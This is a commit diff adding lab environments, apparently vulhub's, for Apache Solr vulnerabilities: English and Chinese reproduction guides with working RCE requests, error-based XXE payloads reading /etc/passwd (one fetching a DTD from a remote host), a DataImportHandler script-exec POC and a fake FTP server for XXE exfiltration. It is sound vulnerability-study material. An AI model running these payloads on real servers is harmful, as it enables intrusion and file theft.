first commit

solr/CVE-2017-12629-RCE/README.md

@@ -0,0 +1,61 @@
+# Apache Solr Remote Command Execution (CVE-2017-12629)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. It is written in Java and built upon Apache Lucene. Before version 7.1.0, two vulnerabilities were discovered: XML External Entity (XXE) and Remote Command Execution (RCE), both numbered as CVE-2017-12629. These two vulnerabilities can be chained together to form an attack chain.
+
+This environment demonstrates the RCE vulnerability.
+
+References:
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 7.0.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+First, create a listener by setting the `exe` value to the command you want to execute and the `args` value to the command parameters:
+
+```
+POST /solr/demo/config HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 158
+
+{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
+```
+
+![](1.png)
+
+Then, trigger the listener by performing an update operation:
+
+```
+POST /solr/demo/update HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 15
+
+[{"id":"test"}]
+```
+
+![](2.png)
+
+Execute `docker compose exec solr bash` to enter the container, and you can see that `/tmp/success` has been successfully created:
+
+![](3.png)

solr/CVE-2017-12629-RCE/README.zh-cn.md

@@ -0,0 +1,59 @@
+# Apache Solr 远程命令执行漏洞（CVE-2017-12629）
+
+Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。在 7.1.0 版本之前，发现了两个漏洞：XML 外部实体注入（XXE）和远程命令执行（RCE），这两个漏洞的编号均为 CVE-2017-12629。这两个漏洞可以连接成利用链。
+
+本环境演示远程命令执行漏洞。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 7.0.1 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面，无需登录。
+
+## 漏洞复现
+
+首先创建一个 listener，设置 `exe` 的值为我们想执行的命令，`args` 的值为命令参数：
+
+```
+POST /solr/demo/config HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 158
+
+{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
+```
+
+![](1.png)
+
+然后进行 update 操作，触发刚才添加的 listener：
+
+```
+POST /solr/demo/update HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 15
+
+[{"id":"test"}]
+```
+
+![](2.png)
+
+执行 `docker compose exec solr bash` 进入容器，可以看到 `/tmp/success` 文件已成功创建：
+
+![](3.png)

solr/CVE-2017-12629-RCE/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:7.0.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"

solr/CVE-2017-12629-XXE/README.md

@@ -0,0 +1,159 @@
+# Apache Solr XML External Entity Injection (CVE-2017-12629)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. It is written in Java and built upon Apache Lucene. Before version 7.1.0, two vulnerabilities were discovered: XML External Entity (XXE) and Remote Command Execution (RCE), both numbered as CVE-2017-12629. These two vulnerabilities can be chained together to form an attack chain.
+
+This environment demonstrates the XXE vulnerability. For the RCE vulnerability and exploitation chain, please refer to [CVE-2017-12629-RCE](../CVE-2017-12629-RCE/).
+
+References:
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 7.0.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+Since the response does not include the information we sent in the XML, this is a Blind XXE vulnerability. However, we can use [Error Based XXE](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) to read files.
+
+To exploit Error Based XXE, we need to find suitable DTD files. Here are several approaches:
+
+### Using fonts.dtd from fontconfig-config
+
+The openjdk Docker image has fontconfig-config installed, which contains a suitable DTD file: `/usr/share/xml/fontconfig/fonts.dtd`.
+
+Construct the XXE payload:
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
+
+    <!ENTITY % expr 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+Send the request with the encoded payload:
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20expr%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+![](1.png)
+
+### Using DTD from JAR Files
+
+Since we can't predict what software is installed on the target server in a black-box scenario, using DTD files from internal JAR files is a better approach. For example, we can use LuceneCoreQuery.dtd from the lucene-queryparser.jar that Solr depends on.
+
+Construct the XXE payload:
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">
+
+    <!ENTITY % queries 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+Send the request with the encoded payload:
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22jar%3Afile%3A%2F%2F%2Fopt%2Fsolr%2Fserver%2Fsolr%2Dwebapp%2Fwebapp%2FWEB%2DINF%2Flib%2Flucene%2Dqueryparser%2D7%2E0%2E1%2Ejar%21%2Forg%2Fapache%2Flucene%2Fqueryparser%2Fxml%2FLuceneCoreQuery%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20queries%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+Successfully read the `/etc/passwd` file:
+
+![](2.png)
+
+### Using Remote DTD Files
+
+If we cannot find suitable local DTD files on the target server and the server can connect to the internet, we can use remote DTD files.
+
+Deploy a DTD file on an HTTP server:
+
+```xml
+<!ENTITY % test "example">
+<!ELEMENT pattern (%test;)>
+```
+
+Then construct the XXE payload:
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "http://evil.host.name/include.dtd">
+
+    <!ENTITY % test 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+Send the request with the encoded payload:
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22https%3A%2F%2Fgist%2Egithubusercontent%2Ecom%2Fphith0n%2F188f03ac0f3c5d899895268f05fd0a51%2Fraw%2F7b481b122622d77c49c619fa047a52051f9652d8%2Finclude%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20test%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+Successfully read the `/etc/passwd` file:
+
+![](3.png)

solr/CVE-2017-12629-XXE/README.zh-cn.md

@@ -0,0 +1,159 @@
+# Apache Solr XML 外部实体注入漏洞（CVE-2017-12629）
+
+Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。在 7.1.0 版本之前，发现了两个漏洞：XML 外部实体注入（XXE）和远程命令执行（RCE），这两个漏洞的编号均为 CVE-2017-12629。这两个漏洞可以连接成利用链。
+
+本环境演示 XXE 漏洞。关于 RCE 漏洞和利用链的演示，请参考 [CVE-2017-12629-RCE](../CVE-2017-12629-RCE/)。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面，无需登录。
+
+## 漏洞复现
+
+由于返回包中不包含我们传入的 XML 中的信息，所以这是一个 Blind XXE 漏洞。但我们可以利用 [Error Based XXE](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) 来读取文件。
+
+要利用 Error Based XXE，需要找到合适的 DTD 文件。这里提供几个思路：
+
+### 使用 fontconfig-config 中的 fonts.dtd
+
+openjdk 的 Docker 镜像安装了 fontconfig-config，其中包含一个符合要求的 DTD 文件：`/usr/share/xml/fontconfig/fonts.dtd`。
+
+构造 XXE Payload：
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
+
+    <!ENTITY % expr 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+将编码后的 payload 放在如下请求中发送：
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20expr%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，成功读取到了 `/etc/passwd` 文件：
+
+![](1.png)
+
+### 使用 JAR 包中的 DTD 文件
+
+由于是黑盒测试，我们无法预测目标服务器安装了哪些软件，使用软件内部的 DTD 文件是一个更好的方法。比如可以使用 Solr 依赖的 lucene-queryparser.jar 中的 LuceneCoreQuery.dtd。
+
+构造 XXE Payload：
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">
+
+    <!ENTITY % queries 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+将编码后的 payload 放在如下请求中发送：
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22jar%3Afile%3A%2F%2F%2Fopt%2Fsolr%2Fserver%2Fsolr%2Dwebapp%2Fwebapp%2FWEB%2DINF%2Flib%2Flucene%2Dqueryparser%2D7%2E0%2E1%2Ejar%21%2Forg%2Fapache%2Flucene%2Fqueryparser%2Fxml%2FLuceneCoreQuery%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20queries%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，成功读取到了 `/etc/passwd` 文件：
+
+![](2.png)
+
+### 使用远程 DTD 文件
+
+如果我们在目标服务器上找不到合适的本地 DTD 文件，且服务器可以连接外网，也可以使用远程 DTD 文件。
+
+在 HTTP 服务器上部署一个 DTD 文件：
+
+```xml
+<!ENTITY % test "example">
+<!ELEMENT pattern (%test;)>
+```
+
+然后构造 XXE Payload：
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "http://evil.host.name/include.dtd">
+
+    <!ENTITY % test 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+将编码后的 payload 放在如下请求中发送：
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22https%3A%2F%2Fgist%2Egithubusercontent%2Ecom%2Fphith0n%2F188f03ac0f3c5d899895268f05fd0a51%2Fraw%2F7b481b122622d77c49c619fa047a52051f9652d8%2Finclude%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20test%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，成功读取到了 `/etc/passwd` 文件：
+
+![](3.png)

solr/CVE-2017-12629-XXE/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:7.0.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"

solr/CVE-2017-12629-XXE/ftp.py

@@ -0,0 +1,28 @@
+#!/usr/bin/env python3
+import socketserver
+
+
+class MyTCPHandler(socketserver.BaseRequestHandler):
+
+    def handle(self):
+        # self.request is the TCP socket connected to the client
+        self.request.send(b'220 xxe-ftp-server\r\n')
+        self.communicating = True
+        while self.communicating:
+            cmd = self.request.recv(1024)
+            if len(cmd) == 0:
+                break
+
+            cmd = cmd.decode().rstrip()
+            print("> " + cmd)
+            if cmd.split(' ', 1)[0] == 'USER':
+                self.request.send(b'331 password please - version check\r\n')
+            else:
+                self.request.send(b'230 more data please!\r\n')
+        
+
+if __name__ == "__main__":
+    HOST, PORT = "0.0.0.0", 2121
+
+    server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
+    server.serve_forever()

solr/CVE-2019-0193/README.md

@@ -0,0 +1,66 @@
+# Apache Solr Remote Command Execution (CVE-2019-0193)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. It is written in Java and built upon Apache Lucene. This vulnerability exists in Apache Solr's DataImportHandler, which is an optional but commonly used module for extracting data from databases and other sources. The vulnerability arises because all DIH configurations can be set through the dataConfig parameter in external requests. Since DIH configurations can contain scripts, attackers can execute remote commands by constructing malicious requests.
+
+References:
+
+- <https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA>
+- <https://paper.seebug.org/1009/>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 8.1.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+First, select the `demo` core from the left sidebar, open the Dataimport panel, enable Debug mode on the right, and enter the following POC:
+
+```
+<dataConfig>
+  <script><![CDATA[
+          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
+          }
+  ]]></script>
+  <document>
+    <entity name="sample"
+            fileName=".*"
+            baseDir="/"
+            processor="FileListEntityProcessor"
+            recursive="false"
+            transformer="script:poc" />
+  </document>
+</dataConfig>
+```
+
+![](1.png)
+
+Click "Execute with this Configuration" to send the following request:
+
+```
+POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
+Host: your-ip:8983
+Content-Length: 613
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-type: application/x-www-form-urlencoded
+Origin: http://your-ip:8983
+Referer: http://your-ip:8983/solr/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+command=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
+```
+
+Execute `docker compose exec solr ls /tmp` to enter the container, and you can see that `touch /tmp/success` has been successfully executed:
+
+![](2.jpg)

solr/CVE-2019-0193/README.zh-cn.md

@@ -0,0 +1,64 @@
+# Apache Solr 远程命令执行漏洞（CVE-2019-0193）
+
+Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在 Apache Solr 的 DataImportHandler，该模块是一个可选但常用的模块，用于从数据库和其他源中提取数据。它具有一个功能，其中所有的 DIH 配置都可以通过外部请求的 dataConfig 参数来设置。由于 DIH 配置可以包含脚本，因此攻击者可以通过构造危险的请求，从而造成远程命令执行。
+
+参考链接：
+
+- <https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA>
+- <https://paper.seebug.org/1009/>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 8.1.1 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面，无需登录。
+
+## 漏洞复现
+
+首先在页面左侧选择 `demo` 核心，打开 Dataimport 面板，开启右侧 Debug mode，填入以下 POC：
+
+```
+<dataConfig>
+  <script><![CDATA[
+          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
+          }
+  ]]></script>
+  <document>
+    <entity name="sample"
+            fileName=".*"
+            baseDir="/"
+            processor="FileListEntityProcessor"
+            recursive="false"
+            transformer="script:poc" />
+  </document>
+</dataConfig>
+```
+
+![](1.png)
+
+点击 "Execute with this Configuration" 会发送以下请求：
+
+```
+POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
+Host: your-ip:8983
+Content-Length: 613
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-type: application/x-www-form-urlencoded
+Origin: http://your-ip:8983
+Referer: http://your-ip:8983/solr/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+command=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
+```
+
+执行 `docker compose exec solr ls /tmp` 进入容器，可以看到 `touch /tmp/success` 已成功执行：
+
+![](2.jpg)

solr/CVE-2019-0193/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:8.1.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"

solr/CVE-2019-17558/README.md

@@ -0,0 +1,64 @@
+# Apache Solr Remote Code Execution Via Velocity Template (CVE-2019-17558)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Solr is the popular, blazing-fast, open source enterprise search platform built on Apache Lucene(TM).
+
